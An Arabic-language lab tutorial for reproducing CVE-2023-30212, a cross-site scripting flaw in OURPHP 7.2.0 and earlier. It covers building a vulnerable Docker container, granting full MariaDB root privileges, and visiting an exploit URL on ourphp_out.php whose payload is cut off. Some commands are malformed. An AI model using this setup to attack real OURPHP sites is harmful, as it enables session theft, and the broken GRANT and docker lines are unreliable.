
بيئة Docker واستغلال الثغرة CVE-2023-30212 CVE-2023-30212 هي ثغرة أمنية تؤثر على إصدارات OURPHP الأقدم من أو المساوية للإصدار 7.2.0. تسمح هذه الثغرة بهجمات البرمجة النصية عبر المواقع (XSS).
بيئة Docker واستغلال ثغرة CVE-2023-30212. CVE-2023-30212 هي ثغرة أمنية تؤثر على إصدارات OURPHP السابقة أو المساوية للإصدار 7.2.0. تسمح هذه الثغرة بهجمات Cross-Site Scripting (XSS)
OURPHP <= 7.2.0 عرضة لثغرة Cross Site Scripting (XSS) عبر /client/manage/ourphp_out.php
قم بتنزيل ملف dockerfile وفك ضغطه
https://down.chinaz.com/api/index/download?id=51308&type=code
قم بتنزيل استغلال CVE 2023-30212
افتح الطرفية (Terminal) في المجلد الذي حفظت فيه ملف dockerfile
قم بتثبيت Docker
sudo apt update
sudo apt install docker.io
قم ببناء صورة Docker استنادًا إلى ملف Dockerfile الموجود في الدليل الحالي
docker build -t < specifies the tag for the image>
docker build -t test .
يُستخدم لتشغيل حاوية Docker استنادًا إلى الصورة ذات العلامة وربط منفذ على الجهاز المضيف بمنفذ داخل الحاوية.
docker run -d -p < Docker image id>
docker run -d -p 8080:80 test
تحقق من صورة Docker
docker ps
احصل على معرّف حاوية جديد
bb18debddccc test "docker-php-entrypoi…" 4 minutes ago Up 4 minutes 0.0.0.0:8080->80/tcp, :::8080->80/tcp angry_turing
نفّذ جلسة bash تفاعلية داخل حاوية Docker قيد التشغيل
docker exec -it bb18debddccc /bin/bash
*احصل على قشرة أوامر Docker
> root@bb18debddccc:/var/www/html#
اضبط قاعدة بيانات MySQL
root@bb18debddccc:/var/www/html# mysql
Welcome to the MariaDB monitor. Commands end with ; or \g.
Your MariaDB connection id is 38
Server version: 10.3.38-MariaDB-0+deb10u1 Debian 10
Copyright (c) 2000, 2018, Oracle, MariaDB Corporation Ab and others.
Type 'help;' or '\h' for help. Type '\c' to clear the current input statement.
MariaDB [(none)]>
استخدم MySQL أو MariaDB لمنح جميع الصلاحيات
GRANT ALL PRIVILEGES ON . TO ' user account'@'localhost' IDENTIFIED BY 'user password' WITH GRANT OPTION;
GRANT ALL PRIVILEGES ON . TO ' root'@'localhost' IDENTIFIED BY 'password' WITH GRANT OPTION;
هذا أمر SQL يُستخدم عادةً في نظام إدارة قواعد البيانات مثل MySQL أو MariaDB لمنح جميع الصلاحيات للمستخدم 'root' على جميع قواعد البيانات والجداول في النظام الحالي.
Url: http://localhost:8080/client/manage/ourphp_out.php?ourphp_admin=logout&out=)
*https://nvd.nist.gov/vuln/detail/CVE-2023-30212
*https://docs.docker.com/engine/install/
chatGpt